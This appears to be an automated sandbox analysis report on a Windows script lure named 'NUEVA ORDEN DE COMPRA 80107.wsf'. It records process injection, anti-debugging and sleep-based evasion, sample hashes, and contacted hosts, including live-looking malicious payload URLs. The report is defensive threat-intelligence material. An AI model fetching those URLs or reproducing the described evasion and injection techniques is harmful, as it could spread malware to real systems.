Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0322BDF2 push eax; ret	27_2_0322BDF8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0322BDFB push eax; ret	27_2_0322BE62
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_032264EE pushfd ; iretd	27_2_032264EF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_032284C6 push edi; retf	27_2_032284C8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000408A34 second address: 0000000000408A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000408DCE second address: 0000000000408DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 0000000003218A34 second address: 0000000003218A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 0000000003218DCE second address: 0000000003218DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6756	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4804	Thread sleep count: 4438 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep count: 2175 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6968	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040	Thread sleep count: 4180 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080	Thread sleep count: 554 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7056	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3024	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772	Thread sleep count: 6258 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784	Thread sleep count: 1964 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5092	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6782	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2784	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 913	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4438	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2175	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4180	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 554	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3746	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3548	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6258
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1964

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 8.5 %
Source: C:\Windows\SysWOW64\WWAHost.exe	API coverage: 8.6 %

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: explorer.exe, 00000006.00000002.888130774.000000000056B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpH
Source: explorer.exe, 00000006.00000000.516443809.00000000005AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:e!kN
Source: explorer.exe, 00000006.00000000.516443809.00000000005AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.409234247.000001FD33770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.450956664.00000181CCDC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 81F008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 3688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 6164	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 3688
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 6164
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 3504
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 4100

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

IP	Domain	Country	ASN	ASN Name	Malicious
199.34.228.47	www.sushifactoryamphawa.com	United States	27647	WEEBLYUS	false
54.203.72.218	www.choicearticleto-readtoday.info	United States	16509	AMAZON-02US	false
45.128.51.66	www.mgav21.xyz	Netherlands	35913	DEDIPATH-LLCUS	false
2.56.57.22	unknown	Netherlands	395800	GBTCLOUDUS	true
91.195.240.103	www.nexusbalance.com	Germany	47846	SEDO-ASDE	false
20.106.232.4	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true

Windows Analysis Report NUEVA ORDEN DE COMPRA 80107.wsf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
NUEVA ORDEN DE COMPRA 80107.wsf

Name	IP	Active
www.salazarcomunicacion.com	103.167.196.150	true
www.sushifactoryamphawa.com	199.34.228.47	true
www.mgav21.xyz	45.128.51.66	true
a-0019.standard.a-msedge.net	204.79.197.222	true
www.nexusbalance.com	91.195.240.103	true
part-0032.t-0009.fbs1-t-msedge.net	13.107.219.60	true
a-9999.a-msedge.net	204.79.197.254	true
www.choicearticleto-readtoday.info	54.203.72.218	true
site-cdn.onenote.net	unknown	unknown
www.createurs-de-bijoux.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.mgav21.xyz/s4ig/?0tx=dCXC+2ZT0QRaPMB/1bkCzyFCQOsWt/uhEcdMypxrEdi7eXd+jvTokAesL3IOP6QRIKOYlLryUQ==&CTM8q=6lUH4xyXELQ8-0r	true	Avira URL Cloud: safe	unknown
http://www.nexusbalance.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=cD7SGqgsMdn1qG9AyDMlGxGbikkTJ3e+SLNAYG8XHeGes8xhGajuA9PSV6Vq4uulpQsNka3DRA==	true	Avira URL Cloud: safe	unknown
www.hibikaiteki.com/s4ig/	true	Avira URL Cloud: malware	low
http://2.56.57.22/tsdfguhijk.txt	true	Avira URL Cloud: safe	unknown
http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf	true	Avira URL Cloud: malware	unknown
http://2.56.57.22/daveCrpted.jpg	true	Avira URL Cloud: safe	unknown
http://www.sushifactoryamphawa.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG+zKIyPgsbPq7aByYUb53Y7vFTrhhhVYwgCqKyQGNMMvVk3uDgUSApaDProA7A9idTtJxA==	true	Avira URL Cloud: safe	unknown
http://20.106.232.4/dll/26-05-2022-StartUp.pdf	true	Avira URL Cloud: malware	unknown
http://www.choicearticleto-readtoday.info/s4ig/?0tx=EE1KxreShStuWGRfOzXQivmJYb01nsHN4Y+USZVKUNF8o5M6FFhEbiUBXOrRFrwbnBV3ymr95w==&CTM8q=6lUH4xyXELQ8-0r	true	Avira URL Cloud: safe	unknown

ID:	635408
Product:	CloudBasic
Start time:	21:14:16
Start date:	27.05.2022
Sample:	NUEVA ORDEN DE COMPRA 80107.wsf
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	f9c710eee0ec4b46dfb370e5e2280c36
SHA1:	c5b21cdd87ec4c5f8349747ecab5963b40556081
SHA256:	02cda7e8e87599f480515b611d57653429825d45dbfd2bcee0b9f1ea8e845fc6

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Done.vbs	Non-ISO extended-ASCII text, with CRLF line terminators	9D7684F978EBD77E6A3EA7EF1330B946	3FA2D2963CBF47FFD5F7F5A9B4576F34ED42E552	6C96E976DC47E0C99B77814E560E0DC63161C463C75FA15B7A7CA83C11720E82
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0i4inhxi.qyz.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fuzbet0.1gd.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pqmaeda.zwf.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ci2jssrm.icg.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5kpxlgc.rz4.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egrwuhbw.ty3.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmtexydj.af0.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0pwlqea.rls.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
